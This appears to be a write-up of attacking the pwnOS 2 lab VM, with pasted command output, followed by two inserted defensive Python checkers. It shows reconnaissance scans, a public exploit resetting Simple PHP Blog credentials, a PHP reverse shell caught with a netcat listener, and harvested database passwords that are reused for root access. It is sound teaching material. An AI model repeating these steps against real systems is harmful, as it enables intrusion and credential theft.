root@kali:~# nmap 10.10.10.100

Starting Nmap 6.47 ( http://nmap.org ) at 2015-07-04 22:44 EDT
Nmap scan report for 10.10.10.100
Host is up (0.00012s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:6C:04:53 (Cadmus Computer Systems)

Nmap done: 1 IP address (1 host up) scanned in 0.30 seconds
root@kali:~# nmap -A 10.10.10.100

Starting Nmap 6.47 ( http://nmap.org ) at 2015-07-04 22:45 EDT
Nmap scan report for 10.10.10.100
Host is up (0.00052s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.8p1 Debian 1ubuntu3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 85:d3:2b:01:09:42:7b:20:4e:30:03:6d:d1:8f:95:ff (DSA)
|   2048 30:7a:31:9a:1b:b8:17:e7:15:df:89:92:0e:cd:58:28 (RSA)
|_  256 10:12:64:4b:7d:ff:6a:87:37:26:38:b1:44:9f:cf:5e (ECDSA)
80/tcp open  http    Apache httpd 2.2.17 ((Ubuntu))
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Welcome to this Site!
MAC Address: 08:00:27:6C:04:53 (Cadmus Computer Systems)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.32 - 2.6.39
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.52 ms 10.10.10.100

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.34 seconds
root@kali:~#
The default webpage on port 80 seemed to be an intranet web site, so I decided to run my usual set of web server enumeration tools against the box.
root@kali:~# nikto -h http://10.10.10.100
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.100
+ Target Hostname:    10.10.10.100
+ Target Port:        80
+ Start Time:         2015-07-04 22:47:08 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.2.17 (Ubuntu)
+ Cookie PHPSESSID created without the httponly flag
+ Retrieved x-powered-by header: PHP/5.3.5-1ubuntu7
+ The anti-clickjacking X-Frame-Options header is not present.
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.php
+ Apache/2.2.17 appears to be outdated (current is at least Apache/2.4.7). Apache 2.0.65 (final release) and 2.2.26 are also current.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3268: /includes/: Directory indexing found.
+ OSVDB-3092: /includes/: This might be interesting...
+ OSVDB-3092: /info/: This might be interesting...
+ OSVDB-3092: /login/: This might be interesting...
+ OSVDB-3092: /register/: This might be interesting...
+ OSVDB-3233: /info.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
+ OSVDB-3268: /icons/: Directory indexing found.
+ Server leaks inodes via ETags, header found with file /icons/README, inode: 1311031, size: 5108, mtime: Tue Aug 28 06:48:10 2007
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-5292: /info.php?file=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/
+ /login.php: Admin login page/section found.
+ 7331 requests: 0 error(s) and 22 item(s) reported on remote host
+ End Time:           2015-07-04 22:47:25 (GMT-4) (17 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
root@kali:~#
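Added example (not code from the original write-up): a small Python checker that parses a raw HTTP response and flags the header-level findings Nikto reported above, so the same weaknesses can be verified from a defender's side after a fix. Both responses are constructed samples, not captures from the box.

```python
# Constructed sample responses (not captured from the box): WEAK carries the
# same header weaknesses Nikto reported; HARDENED is what a fixed server sends.
WEAK = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache/2.2.17 (Ubuntu)\r\n"
    "X-Powered-By: PHP/5.3.5-1ubuntu7\r\n"
    "Set-Cookie: PHPSESSID=deadbeef; path=/\r\n"
    "TCN: list\r\n"
    "Content-Type: text/html\r\n\r\n<html></html>"
)
HARDENED = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache\r\n"
    "Set-Cookie: PHPSESSID=deadbeef; path=/; HttpOnly\r\n"
    "X-Frame-Options: DENY\r\n"
    "Content-Type: text/html\r\n\r\n<html></html>"
)

def parse_headers(raw):
    """Return headers as (lowercase name, value) pairs; a list rather than a
    dict because Set-Cookie may legitimately appear more than once."""
    head = raw.split("\r\n\r\n", 1)[0]
    pairs = []
    for line in head.split("\r\n")[1:]:          # skip the status line
        name, _, value = line.partition(":")
        pairs.append((name.strip().lower(), value.strip()))
    return pairs

def audit_headers(raw):
    """Flag the header issues from the Nikto output: session cookie without
    HttpOnly, version disclosure, MultiViews (TCN), missing X-Frame-Options."""
    headers = parse_headers(raw)
    findings = []
    for name, value in headers:
        if name == "set-cookie":
            cookie = value.split("=", 1)[0].strip()
            attrs = {a.strip().lower() for a in value.split(";")[1:]}
            if "httponly" not in attrs:
                findings.append(f"cookie {cookie} set without HttpOnly")
        elif name == "x-powered-by":
            findings.append(f"version disclosure: X-Powered-By: {value}")
        elif name == "server" and "/" in value:
            findings.append(f"version disclosure: Server: {value}")
        elif name == "tcn":
            findings.append("TCN header present: mod_negotiation MultiViews enabled")
    if "x-frame-options" not in {n for n, _ in headers}:
        findings.append("X-Frame-Options header missing (clickjacking)")
    return findings
```

audit_headers(WEAK) returns five findings and audit_headers(HARDENED) returns none; on a live host, feed it the raw response from a single request instead of the constructed strings.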
root@kali:~# dirb http://10.10.10.100 /usr/share/wordlists/dirb/big.txt

-----------------
DIRB v2.21
By The Dark Raver
-----------------

START_TIME: Sat Jul  4 22:48:59 2015
URL_BASE: http://10.10.10.100/
WORDLIST_FILES: /usr/share/wordlists/dirb/big.txt

-----------------

GENERATED WORDS: 20458

---- Scanning URL: http://10.10.10.100/ ----
+ http://10.10.10.100/activate (CODE:302|SIZE:0)
==> DIRECTORY: http://10.10.10.100/blog/
+ http://10.10.10.100/cgi-bin/ (CODE:403|SIZE:288)
==> DIRECTORY: http://10.10.10.100/includes/
+ http://10.10.10.100/index (CODE:200|SIZE:854)
+ http://10.10.10.100/info (CODE:200|SIZE:50171)
+ http://10.10.10.100/login (CODE:200|SIZE:1174)
+ http://10.10.10.100/register (CODE:200|SIZE:1562)
+ http://10.10.10.100/server-status (CODE:403|SIZE:293)

---- Entering directory: http://10.10.10.100/blog/ ----
+ http://10.10.10.100/blog/add (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/atom (CODE:200|SIZE:1062)
+ http://10.10.10.100/blog/categories (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/colors (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/comments (CODE:302|SIZE:0)
==> DIRECTORY: http://10.10.10.100/blog/config/
+ http://10.10.10.100/blog/contact (CODE:200|SIZE:5921)
==> DIRECTORY: http://10.10.10.100/blog/content/
+ http://10.10.10.100/blog/delete (CODE:302|SIZE:0)
==> DIRECTORY: http://10.10.10.100/blog/docs/
==> DIRECTORY: http://10.10.10.100/blog/flash/
==> DIRECTORY: http://10.10.10.100/blog/images/
+ http://10.10.10.100/blog/index (CODE:200|SIZE:8093)
+ http://10.10.10.100/blog/info (CODE:302|SIZE:0)
==> DIRECTORY: http://10.10.10.100/blog/interface/
==> DIRECTORY: http://10.10.10.100/blog/languages/
+ http://10.10.10.100/blog/login (CODE:200|SIZE:5670)
+ http://10.10.10.100/blog/logout (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/options (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/rdf (CODE:200|SIZE:1411)
+ http://10.10.10.100/blog/rss (CODE:200|SIZE:1237)
==> DIRECTORY: http://10.10.10.100/blog/scripts/
+ http://10.10.10.100/blog/search (CODE:200|SIZE:4954)
+ http://10.10.10.100/blog/setup (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/static (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/stats (CODE:200|SIZE:5312)
==> DIRECTORY: http://10.10.10.100/blog/themes/
+ http://10.10.10.100/blog/trackback (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/upgrade (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/upload_img (CODE:302|SIZE:0)

---- Entering directory: http://10.10.10.100/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.100/blog/config/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.100/blog/content/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.100/blog/docs/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.100/blog/flash/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.100/blog/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.100/blog/interface/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.100/blog/languages/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.100/blog/scripts/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.100/blog/themes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

-----------------
DOWNLOADED: 40916 - FOUND: 28
root@kali:~#
The DirBuster scan also revealed a login.php page, which seemed to be prone to SQL injection but was definitely filtering some of the more basic exploits.
I decided to take a closer look at the source of the /blog page and found that the underlying app was Simple PHP Blog 0.4.0.
Let's see if we can find any vulnerabilities or exploits associated with Simple PHP Blog 0.4.0.
Exploit-DB had a couple of exploits that fit the bill: one Metasploit module, as well as the Perl-based exploit that I decided to go with.
root@kali:~/pwnos2# perl 1191.pl -h http://10.10.10.100/blog -e 2
________________________________________________________________________________
SimplePHPBlog v0.4.0 Exploits by
Kenneth F. Belva, CISSP
http://www.ftusecurity.com
________________________________________________________________________________
Running Username and Password Hash Retrieval Exploit....
Retrieved Username and Password Hash:
$1$zsdi5o/7$kJuEkwpL6uEqhrXFDn98y/
*** Exploit Completed.... Have a nice day! :)
root@kali:~/pwnos2# perl 1191.pl -h http://10.10.10.100/blog -e 3
________________________________________________________________________________
SimplePHPBlog v0.4.0 Exploits by
Kenneth F. Belva, CISSP
http://www.ftusecurity.com
________________________________________________________________________________
Running Set New Username and Password Exploit....
Deleted File: ./config/password.txt
Use of uninitialized value $user in concatenation (.) or string at 1191.pl line 341.
./config/password.txt created!
Use of uninitialized value $pass in concatenation (.) or string at 1191.pl line 342.
Username is set to:
Password is set to:
*** Exploit Completed.... Have a nice day! :)
root@kali:~/pwnos2# perl 1191.pl -h http://10.10.10.100/blog -e 3 -U court -P password
________________________________________________________________________________
SimplePHPBlog v0.4.0 Exploits by
Kenneth F. Belva, CISSP
http://www.ftusecurity.com
________________________________________________________________________________
Running Set New Username and Password Exploit....
Deleted File: ./config/password.txt
./config/password.txt created!
Username is set to: court
Password is set to: password
*** Exploit Completed.... Have a nice day! :)
root@kali:~/pwnos2# ls
1191.pl  exploit2.php  exploit.php
root@kali:~/pwnos2# cp /var/www/php-reverse-shell.php .
root@kali:~/pwnos2# nano php-reverse-shell.php
root@kali:~/pwnos2#
Awesome, the exploit allowed me to create a user on the blog application; hopefully I can now upload a web or reverse shell to the system.
The first place I always check is on the Kali Linux distro under /usr/share/webshells/php. I used the old reliable php_reverse_shell.php. After modifying the code to match my IP address, I successfully uploaded the code to the blog site. I was afraid that I'd run into filtering which would restrict the file type, but was lucky this time.
I uploaded the shell, started a netcat listener on my system on port 1234, as set within my php_reverse_shell.php file, browsed to the malicious page (10.10.10.100/blog/images/php_reverse_shell.php) and boom! I'm in.
Having no job control in this shell, I used the installed instance of Python to get an improved shell. I looked around a bit in the /var/www directory for interesting giveaways in files.
root@kali:~/pwnos2# nc -lvp 1234
listening on [any] 1234 ...
10.10.10.100: inverse host lookup failed: Unknown server error : Connection timed out
connect to [10.10.10.5] from (UNKNOWN) [10.10.10.100] 36792
Linux web 2.6.38-8-server #42-Ubuntu SMP Mon Apr 11 03:49:04 UTC 2011 x86_64 x86_64 x86_64 GNU/Linux
 01:57:41 up  3:34,  0 users,  load average: 0.00, 0.01, 0.05
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: can't access tty; job control turned off
$ /bin/bash -i
bash: no job control in this shell
www-data@web:/var/www$ python -c 'import pty; pty.spawn("/bin/bash")'
python -c 'import pty; pty.spawn("/bin/bash")'
www-data@web:/var/www$ ls
ls
activate.php  includes  info.php  mysqli_connect.php  blog  index.php  login.php  register.php
www-data@web:/var/www$ more
The file named mysqli_connect.php had some mysql db credentials in it.
DEFINE ('DB_USER', 'root');
DEFINE ('DB_PASSWORD', 'goodday');
DEFINE ('DB_HOST', 'localhost');
DEFINE ('DB_NAME', 'ch16');
We all know about the likelihood of password reuse, so I attempted to try what I found both inside and outside the database. Unfortunately it didn't work out for me. I spent several hours running local privilege escalation exploits, Linux privilege vulnerability scripts, etc., until I stumbled across a separate file also named mysqli_connect.php located in the /var directory. This file had separate credentials which worked for the MySQL instance. I decided to pillage the db a bit.
cat mysqli_connect.php
// This file contains the database access information.
// This file also establishes a connection to MySQL
// and selects the database.

// Set the database access information as constants:
DEFINE ('DB_USER', 'root');
DEFINE ('DB_PASSWORD', 'root@ISIntS');
DEFINE ('DB_HOST', 'localhost');
DEFINE ('DB_NAME', 'ch16');

// Make the connection:
$dbc = @mysqli_connect (DB_HOST, DB_USER, DB_PASSWORD, DB_NAME) OR die ('Could not connect to MySQL: ' . mysqli_connect_error() );
?>www-data@web:/var$
www-data@web:/var$ mysql -u root
mysql -u root
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: NO)
www-data@web:/var$ mysql -u root -proot@ISIntS
mysql -u root -proot@ISIntS
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 1113
Server version: 5.1.54-1ubuntu4 (Ubuntu)

Copyright (c) 2000, 2010, Oracle and/or its affiliates. All rights reserved.
This software comes with ABSOLUTELY NO WARRANTY. This is free software,
and you are welcome to modify and redistribute it under the GPL v2 license

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> show databases;
show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| ch16               |
| mysql              |
+--------------------+
3 rows in set (0.00 sec)

mysql> use ch16;
use ch16;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
show tables;
+----------------+
| Tables_in_ch16 |
+----------------+
| users          |
+----------------+
1 row in set (0.00 sec)

mysql> select * from users;
select * from users;
+---------+------------+-----------+------------------+------------------------------------------+------------+--------+---------------------+
| user_id | first_name | last_name | email            | pass                                     | user_level | active | registration_date   |
+---------+------------+-----------+------------------+------------------------------------------+------------+--------+---------------------+
|       1 | Dan        | Privett   | admin@isints.com | c2c4b4e51d9e23c02c15702c136c3e950ba9a4af |          0 | NULL   | 2011-05-07 17:27:01 |
+---------+------------+-----------+------------------+------------------------------------------+------------+--------+---------------------+
1 row in set (0.00 sec)

mysql>
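Added example (not code from the original write-up): a Python scanner that walks a directory tree for PHP files hard-coding DB_* constants the way both mysqli_connect.php copies above do, and flags the two things that made this finding costly on the box: the application using the database root account, and a file readable by any local user such as www-data. The demo() tree, its file contents and the PLACEHOLDER passwords are constructed.

```python
import os, re, stat, tempfile

# DEFINE ('DB_USER', 'root'); as in both mysqli_connect.php copies; case-insensitive like PHP.
DEFINE_RE = re.compile(r"""define\s*\(\s*['"](DB_\w+)['"]\s*,\s*['"]([^'"]*)['"]\s*\)""", re.I)

def find_db_credentials(source):
    """Return the DB_* constants hard-coded in one PHP source as a dict."""
    return {name.upper(): value for name, value in DEFINE_RE.findall(source)}

def risk_flags(creds, mode):
    """Why a hit matters: app uses the DB root account; file readable by any local user."""
    flags = []
    if creds.get("DB_USER") == "root":
        flags.append("db-root-account")
    if mode & stat.S_IROTH:
        flags.append("world-readable")
    return flags

def scan_tree(root):
    """Report (relative path, DB user, flags) for every PHP file embedding DB credentials."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if not fn.endswith(".php"):
                continue
            path = os.path.join(dirpath, fn)
            with open(path, encoding="utf-8", errors="replace") as fh:
                creds = find_db_credentials(fh.read())
            if creds:
                flags = risk_flags(creds, os.stat(path).st_mode)
                findings.append((os.path.relpath(path, root), creds.get("DB_USER"), flags))
    return sorted(findings)

def demo():
    """Constructed tree mirroring the box (one copy under www/, one a level up);
    passwords are placeholders, not the values from the write-up."""
    files = {
        "www/mysqli_connect.php": "<?php\nDEFINE ('DB_USER', 'root');\nDEFINE ('DB_PASSWORD', 'PLACEHOLDER_1');\n",
        "mysqli_connect.php": "<?php\nDEFINE ('DB_USER', 'root');\nDEFINE ('DB_PASSWORD', 'PLACEHOLDER_2');\n",
        "www/index.php": "<?php echo 'hello'; ?>\n",  # no credentials: ignored
    }
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "www"))
        for rel, body in files.items():
            path = os.path.join(root, rel)
            with open(path, "w") as fh:
                fh.write(body)
            os.chmod(path, 0o644)  # world-readable, as the copies on the box were
        return scan_tree(root)
```

demo() returns both mysqli_connect.php copies flagged db-root-account and world-readable; scan_tree("/var/www") runs the same check against a real document root.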
The db contents could have proven helpful in my conquest, but I gave the credentials a go on the system and boom, good ol' password reuse strikes again.
Woot, woot!
I enjoyed this VM a lot; thanks to the guys at http://www.pwnos.com/. I'll keep my eyes open for a Version 3.